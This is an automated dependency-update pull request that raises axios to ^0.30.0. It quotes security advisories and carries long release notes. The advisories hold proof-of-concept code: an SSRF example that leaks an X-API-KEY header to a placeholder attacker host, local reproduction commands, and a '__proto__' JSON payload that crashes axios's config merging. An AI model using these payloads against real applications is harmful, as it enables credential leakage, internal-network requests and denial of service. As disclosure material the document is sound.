Update dependency axios to ^0.30.0 [SECURITY]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
axios (source)	^0.20.0 → ^0.30.0

GitHub Vulnerability Alerts

CVE-2020-28168

Axios NPM package 0.21.0 contains a Server-Side Request Forgery (SSRF) vulnerability where an attacker is able to bypass a proxy by providing a URL that responds with a redirect to a restricted host or IP address.

CVE-2021-3749

axios before v0.21.2 is vulnerable to Inefficient Regular Expression Complexity.

CVE-2023-45857

An issue discovered in Axios 0.8.1 through 1.5.1 inadvertently reveals the confidential XSRF-TOKEN stored in cookies by including it in the HTTP header X-XSRF-TOKEN for every request made to any host allowing attackers to view sensitive information.

CVE-2025-27152

Summary

A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery). Reference: axios/axios#6463

A similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if ⁠baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.

Details

Consider the following code snippet:

import axios from "axios";

const internalAPIClient = axios.create({
  baseURL: "http://example.test/api/v1/users/",
  headers: {
    "X-API-KEY": "1234567890",
  },
});

// const userId = "123";
const userId = "http://attacker.test/";

await internalAPIClient.get(userId); // SSRF

In this example, the request is sent to http://attacker.test/ instead of the baseURL. As a result, the domain owner of attacker.test would receive the X-API-KEY included in the request headers.

It is recommended that:

• When baseURL is set, passing an absolute URL such as http://attacker.test/ to get() should not ignore baseURL.
• Before sending the HTTP request (after combining the baseURL with the user-provided parameter), axios should verify that the resulting URL still begins with the expected baseURL.

PoC

Follow the steps below to reproduce the issue:

1. Set up two simple HTTP servers:

mkdir /tmp/server1 /tmp/server2
echo "this is server1" > /tmp/server1/index.html 
echo "this is server2" > /tmp/server2/index.html
python -m http.server -d /tmp/server1 10001 &
python -m http.server -d /tmp/server2 10002 &

2. Create a script (e.g., main.js):

import axios from "axios";
const client = axios.create({ baseURL: "http://localhost:10001/" });
const response = await client.get("http://localhost:10002/");
console.log(response.data);

3. Run the script:

$ node main.js
this is server2

Even though baseURL is set to http://localhost:10001/, axios sends the request to http://localhost:10002/.

Impact

• Credential Leakage: Sensitive API keys or credentials (configured in axios) may be exposed to unintended third-party hosts if an absolute URL is passed.
• SSRF (Server-Side Request Forgery): Attackers can send requests to other internal hosts on the network where the axios program is running.
• Affected Users: Software that uses baseURL and does not validate path parameters is affected by this issue.

CVE-2026-25639

Denial of Service via proto Key in mergeConfig

Summary

The mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.

Details

The vulnerability exists in lib/core/mergeConfig.js at lines 98-101:

utils.forEach(Object.keys({ ...config1, ...config2 }), function computeConfigValue(prop) {
  const merge = mergeMap[prop] || mergeDeepProperties;
  const configValue = merge(config1[prop], config2[prop], prop);
  (utils.isUndefined(configValue) && merge !== mergeDirectKeys) || (config[prop] = configValue);
});

When prop is '__proto__':

1. JSON.parse('{"__proto__": {...}}') creates an object with __proto__ as an own enumerable property
2. Object.keys() includes '__proto__' in the iteration
3. mergeMap['__proto__'] performs prototype chain lookup, returning Object.prototype (truthy object)
4. The expression mergeMap[prop] || mergeDeepProperties evaluates to Object.prototype
5. Object.prototype(...) throws TypeError: merge is not a function

The mergeConfig function is called by:

• Axios._request() at lib/core/Axios.js:75
• Axios.getUri() at lib/core/Axios.js:201
• All HTTP method shortcuts (get, post, etc.) at lib/core/Axios.js:211,224

PoC

import axios from "axios";

const maliciousConfig = JSON.parse('{"__proto__": {"x": 1}}');
await axios.get("https://httpbin.org/get", maliciousConfig);

Reproduction steps:

1. Clone axios repository or npm install axios
2. Create file poc.mjs with the code above
3. Run: node poc.mjs
4. Observe the TypeError crash

Verified output (axios 1.13.4):

TypeError: merge is not a function
    at computeConfigValue (lib/core/mergeConfig.js:100:25)
    at Object.forEach (lib/utils.js:280:10)
    at mergeConfig (lib/core/mergeConfig.js:98:9)

Control tests performed:

Test	Config	Result
Normal config	{"timeout": 5000}	SUCCESS
Malicious config	JSON.parse('{"__proto__": {"x": 1}}')	CRASH
Nested object	{"headers": {"X-Test": "value"}}	SUCCESS

Attack scenario:
An application that accepts user input, parses it with JSON.parse(), and passes it to axios configuration will crash when receiving the payload {"__proto__": {"x": 1}}.

Impact

Denial of Service - Any application using axios that processes user-controlled JSON and passes it to axios configuration methods is vulnerable. The application will crash when processing the malicious payload.

Affected environments:

• Node.js servers using axios for HTTP requests
• Any backend that passes parsed JSON to axios configuration

This is NOT prototype pollution - the application crashes before any assignment occurs.

---

Release Notes

axios/axios (axios)

v0.30.3

Compare Source

v0.30.2

Compare Source

What's Changed

• Backport maxContentLength vulnerability fix to v0.x by @​FeBe95 in #​7034

New Contributors

• @​FeBe95 made their first contribution in #​7034

Full Changelog: axios/axios@v0.30.1...v0.30.2

v0.30.1

Compare Source

Release notes:

Bug Fixes

• chore(deps): bump form-data from 4.0.0 to 4.0.4 for v0.x by @​wolandec in #​6978

Contributors to this release

• @​wolandec made their first contribution in #​6978

Full Changelog: axios/axios@v0.30.0...v0.30.1

v0.30.0

Compare Source

Release notes:

Bug Fixes

• fix: modify log while request is aborted by @​mori5321 in #​4917
• fix: update CHANGELOG.md for v0.x by @​TehZarathustra in #​6271
• fix: modify upgrade guide for 0.28.1's breaking change by @​nafeger in #​6787
• fix: backport allowAbsoluteUrls vulnerability fix to v0.x by @​thatguyinabeanie in #​6829
• fix: add allowAbsoluteUrls type by @​thatguyinabeanie in #​6849

Contributors to this release

• @​mori5321 made their first contribution in #​4917
• @​TehZarathustra made their first contribution in #​6271
• @​nafeger made their first contribution in #​6787
• @​thatguyinabeanie made their first contribution in #​6829

Full Changelog: axios/axios@v0.29.0...v0.30.0

v0.29.0

Compare Source

Release notes:

Bug Fixes

• fix(backport): backport security fixes in commits #​6167 and #​6163 to v0.x by @​Sean-Powell in #​6402
• fix: omit nulls in params by @​Willshaw in #​6394
• fix(backport): fix paramsSerializer function validation by @​solonzhu in #​6361
• fix: Regular Expression Denial of Service (ReDoS) by @​qiongshusheng in #​6708

Contributors to this release

• @​Sean-Powell made their first contribution in #​6402
• @​Willshaw made their first contribution in #​6394
• @​solonzhu made their first contribution in #​6361
• @​qiongshusheng made their first contribution in #​6708

v0.28.1

Compare Source

Release notes:

Release notes:

Bug Fixes

• fix(backport): custom params serializer support (#​6263)
• fix(backport): uncaught ReferenceError req is not defined (#​6307)

v0.28.0

Compare Source

Release notes:

Bug Fixes

• fix(security): fixed CVE-2023-45857 by backporting withXSRFToken option to v0.x (#​6091)

Backports from v1.x:

• Allow null indexes on formSerializer and paramsSerializer v0.x (#​4961)
• Fixing content-type header repeated #​4745
• Fixed timeout error message for HTTP 4738
• Added axios.formToJSON method (#​4735)
• URL params serializer (#​4734)
• Fixed toFormData Blob issue on node>v17 #​4728
• Adding types for progress event callbacks #​4675
• Fixed max body length defaults #​4731
• Added data URL support for node.js (#​4725)
• Added isCancel type assert (#​4293)
• Added the ability for the url-encoded-form serializer to respect the formSerializer config (#​4721)
• Add string[] to AxiosRequestHeaders type (#​4322)
• Allow type definition for axios instance methods (#​4224)
• Fixed AxiosError stack capturing; (#​4718)
• Fixed AxiosError status code type; (#​4717)
• Adding Canceler parameters config and request (#​4711)
• fix(types): allow to specify partial default headers for instance creation (#​4185)
• Added blob to the list of protocols supported by the browser (#​4678)
• Fixing Z_BUF_ERROR when no content (#​4701)
• Fixed race condition on immediate requests cancellation (#​4261)
• Added a clear() function to the request and response interceptors object so a user can ensure that all interceptors have been removed from an Axios instance #​4248
• Added generic AxiosAbortSignal TS interface to avoid importing AbortController polyfill (#​4229)
• Fix TS definition for AxiosRequestTransformer (#​4201)
• Use type alias instead of interface for AxiosPromise (#​4505)
• Include request and config when creating a CanceledError instance (#​4659)
• Added generic TS types for the exposed toFormData helper (#​4668)
• Optimized the code that checks cancellation (#​4587)
• Replaced webpack with rollup (#​4596)
• Added stack trace to AxiosError (#​4624)
• Updated AxiosError.config to be optional in the type definition (#​4665)
• Removed incorrect argument for NetworkError constructor (#​4656)

v0.27.2

Compare Source

Fixes and Functionality:

• Fixed FormData posting in browser environment by reverting #​3785 (#​4640)
• Enhanced protocol parsing implementation (#​4639)
• Fixed bundle size

v0.27.1

Compare Source

Fixes and Functionality:

• Removed import of url module in browser build due to huge size overhead and builds being broken (#​4594)
• Bumped follow-redirects to ^1.14.9 (#​4615)

v0.27.0

Compare Source

Breaking changes:

• New toFormData helper function that allows the implementor to pass an object and allow axios to convert it to FormData (#​3757)
• Removed functionality that removed the the Content-Type request header when passing FormData (#​3785)
• (*) Refactored error handling implementing AxiosError as a constructor, this is a large change to error handling on the whole (#​3645)
• Separated responsibility for FormData instantiation between transformRequest and toFormData (#​4470)
• (*) Improved and fixed multiple issues with FormData support (#​4448)

QOL and DevX improvements:

• Added a multipart/form-data testing playground allowing contributors to debug changes easily (#​4465)

Fixes and Functionality:

• Refactored project file structure to avoid circular imports (#​4515) & (#​4516)
• Bumped follow-redirects to ^1.14.9 (#​4562)

Internal and Tests:

• Updated dev dependencies to latest version

Documentation:

• Fixing incorrect link in changelog (#​4551)

Notes:

• (*) Please read these pull requests before updating, these changes are very impactful and far reaching.

v0.26.1

Compare Source

Fixes and Functionality:

• Refactored project file structure to avoid circular imports (#​4220)

v0.26.0

Compare Source

Fixes and Functionality:

• Fixed The timeoutErrorMessage property in config not work with Node.js (#​3581)
• Added errors to be displayed when the query parsing process itself fails (#​3961)
• Fix/remove url required (#​4426)
• Update follow-redirects dependency due to Vulnerability (#​4462)
• Bump karma from 6.3.11 to 6.3.14 (#​4461)
• Bump follow-redirects from 1.14.7 to 1.14.8 (#​4473)

v0.25.0

Compare Source

Breaking changes:

• Fixing maxBodyLength enforcement (#​3786)
• Don't rely on strict mode behaviour for arguments (#​3470)
• Adding error handling when missing url (#​3791)
• Update isAbsoluteURL.js removing escaping of non-special characters (#​3809)
• Use native Array.isArray() in utils.js (#​3836)
• Adding error handling inside stream end callback (#​3967)

Fixes and Functionality:

• Added aborted even handler (#​3916)
• Header types expanded allowing boolean and number types (#​4144)
• Fix cancel signature allowing cancel message to be undefined (#​3153)
• Updated type checks to be formulated better (#​3342)
• Avoid unnecessary buffer allocations (#​3321)
• Adding a socket handler to keep TCP connection live when processing long living requests (#​3422)
• Added toFormData helper function (#​3757)
• Adding responseEncoding prop type in AxiosRequestConfig (#​3918)

Internal and Tests:

• Adding axios-test-instance to ecosystem (#​3786)
• Optimize the logic of isAxiosError (#​3546)
• Add tests and documentation to display how multiple inceptors work (#​3564)
• Updating follow-redirects to version 1.14.7 (#​4379)

Documentation:

• Fixing changelog to show corrext pull request (#​4219)
• Update upgrade guide for https proxy setting (#​3604)

Huge thanks to everyone who contributed to this release via code (authors listed below) or via reviews and triaging on GitHub:

• Jay
• Rijk van Zanten
• Kohta Ito
• Brandon Faulkner
• Stefano Magni
• enofan
• Andrey Pechkurov
• Doowonee
• Emil Broman
• Remco Haszing
• Black-Hole
• Wolfram Kriesing
• Andrew Ovens
• Paulo Renato
• Ben Carp
• Hirotaka Tagawa
• 狼族小狈
• C. Lewis
• Felipe Carvalho
• Daniel
• Gustavo Sales

v0.24.0

Compare Source

Breaking changes:

• Revert: change type of AxiosResponse to any, please read lengthy discussion here: (#​4141) pull request: (#​4186)

Huge thanks to everyone who contributed to this release via code (authors listed below) or via reviews and triaging on GitHub:

• Jay
• Rodry
• Remco Haszing
• Isaiah Thomason

v0.23.0

Compare Source

Breaking changes:

• Distinguish request and response data types (#​4116)
• Change never type to unknown (#​4142)
• Fixed TransitionalOptions typings (#​4147)

Fixes and Functionality:

• Adding globalObject: 'this' to webpack config (#​3176)
• Adding insecureHTTPParser type to AxiosRequestConfig (#​4066)
• Fix missing semicolon in typings (#​4115)
• Fix response headers types (#​4136)

Internal and Tests:

• Improve timeout error when timeout is browser default (#​3209)
• Fix node version on CI (#​4069)
• Added testing to TypeScript portion of project (#​4140)

Documentation:

• Rename Angular to AngularJS (#​4114)

Huge thanks to everyone who contributed to this release via code (authors listed below) or via reviews and triaging on GitHub:

• Jay
• Evan-Finkelstein
• Paweł Szymański
• Dobes Vandermeer
• Claas Augner
• Remco Haszing
• Evgeniy
• Dmitriy Mozgovoy

v0.22.0

Compare Source

Fixes and Functionality:

• Caseless header comparing in HTTP adapter (#​2880)
• Avoid package.json import fixing issues and warnings related to this (#​4041), (#​4065)
• Fixed cancelToken leakage and added AbortController support (#​3305)
• Updating CI to run on release branches
• Bump follow redirects version
• Fixed default transitional config for custom Axios instance; (#​4052)

Huge thanks to everyone who contributed to this release via code (authors listed below) or via reviews and triaging on GitHub:

• Jay
• Matt R. Wilson
• Xianming Zhong
• Dmitriy Mozgovoy

v0.21.4

Compare Source

Fixes and Functionality:

• Fixing JSON transform when data is stringified. Providing backward compatibility and complying to the JSON RFC standard (#​4020)

Huge thanks to everyone who contributed to this release via code (authors listed below) or via reviews and triaging on GitHub:

• Guillaume Fortaine
• Yusuke Kawasaki
• Dmitriy Mozgovoy

v0.21.3

Compare Source

Fixes and Functionality:

• Fixing response interceptor not being called when request interceptor is attached (#​4013)

Huge thanks to everyone who contributed to this release via code (authors listed below) or via reviews and triaging on GitHub:

• Julian Hollmann

v0.21.2

Compare Source

Fixes and Functionality:

• Updating axios requests to be delayed by pre-emptive promise creation (#​2702)
• Adding "synchronous" and "runWhen" options to interceptors api (#​2702)
• Updating of transformResponse (#​3377)
• Adding ability to omit User-Agent header (#​3703)
• Adding multiple JSON improvements (#​3688, #​3763)
• Fixing quadratic runtime and extra memory usage when setting a maxContentLength (#​3738)
• Adding parseInt to config.timeout (#​3781)
• Adding custom return type support to interceptor (#​3783)
• Adding security fix for ReDoS vulnerability (#​3980)

Internal and Tests:

• Updating build dev dependancies (#​3401)
• Fixing builds running on Travis CI (#​3538)
• Updating follow rediect version (#​3694, #​3771)
• Updating karma sauce launcher to fix failing sauce tests (#​3712, #​3717)
• Updating content-type header for application/json to not contain charset field, according do RFC 8259 (#​2154)
• Fixing tests by bumping karma-sauce-launcher version (#​3813)
• Changing testing process from Travis CI to GitHub Actions (#​3938)

Documentation:

• Updating documentation around the use of AUTH_TOKEN with multiple domain endpoints (#​3539)
• Remove duplication of item in changelog (#​3523)
• Fixing gramatical errors (#​2642)
• Fixing spelling error (#​3567)
• Moving gitpod metion (#​2637)
• Adding new axios documentation website link (#​3681, #​3707)
• Updating documentation around dispatching requests (#​3772)
• Adding documentation for the type guard isAxiosError (#​3767)
• Adding explanation of cancel token (#​3803)
• Updating CI status badge (#​3953)
• Fixing errors with JSON documentation (#​3936)
• Fixing README typo under Request Config (#​3825)
• Adding axios-multi-api to the ecosystem file (#​3817)
• Adding SECURITY.md to properly disclose security vulnerabilities (#​3981)

Huge thanks to everyone who contributed to this release via code (authors listed below) or via reviews and triaging on GitHub:

• Sasha Korotkov
• Daniel Lopretto
• Mike Bishop
• Dmitriy Mozgovoy
• Mark
• Philipe Gouveia Paixão
• hippo
• ready-research
• Xianming Zhong
• Christopher Chrapka
• Brian Anglin
• Kohta Ito
• Ali Clark
• caikan
• Elina Gorshkova
• Ryota Ikezawa
• Nisar Hassan Naqvi
• Jake
• TagawaHirotaka
• Johannes Jarbratt
• Mo Sattler
• Sam Carlton
• Matt Czapliński
• Ziding Zhang

v0.21.1

Compare Source

Fixes and Functionality:

• Hotfix: Prevent SSRF (#​3410)
• Protocol not parsed when setting proxy config from env vars (#​3070)
• Updating axios in types to be lower case (#​2797)
• Adding a type guard for AxiosError (#​2949)

Internal and Tests:

• Remove the skipping of the socket http test (#​3364)
• Use different socket for Win32 test (#​3375)

Huge thanks to everyone who contributed to this release via code (authors listed below) or via reviews and triaging on GitHub:

• Daniel Lopretto <timemachine3030@​users.noreply.github.com>
• Jason Kwok JasonHK@users.noreply.github.com
• Jay jasonsaayman@gmail.com
• Jonathan Foster jonathan@jonathanfoster.io
• Remco Haszing remcohaszing@gmail.com
• Xianming Zhong chinesedfan@qq.com

v0.21.0

Compare Source

Fixes and Functionality:

• Fixing requestHeaders.Authorization (#​3287)
• Fixing node types (#​3237)
• Fixing axios.delete ignores config.data (#​3282)
• Revert "Fixing overwrite Blob/File type as Content-Type in browser. (#​1773)" (#​3289)
• Fixing an issue that type 'null' and 'undefined' is not assignable to validateStatus when typescript strict option is enabled (#​3200)

Internal and Tests:

• Lock travis to not use node v15 (#​3361)

Documentation:

• Fixing simple typo, existant -> existent (#​3252)
• Fixing typos (#​3309)

Huge thanks to everyone who contributed to this release via code (authors listed below) or via reviews and triaging on GitHub:

• Allan Cruz 57270969+Allanbcruz@users.noreply.github.com
• George Cheng Gerhut@GMail.com
• Jay jasonsaayman@gmail.com
• Kevin Kirsche Kev.Kirsche+GitHub@gmail.com
• Remco Haszing remcohaszing@gmail.com
• Taemin Shin <cprayer13@​gmail.com>
• Tim Gates tim.gates@iress.com
• Xianming Zhong chinesedfan@qq.com

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.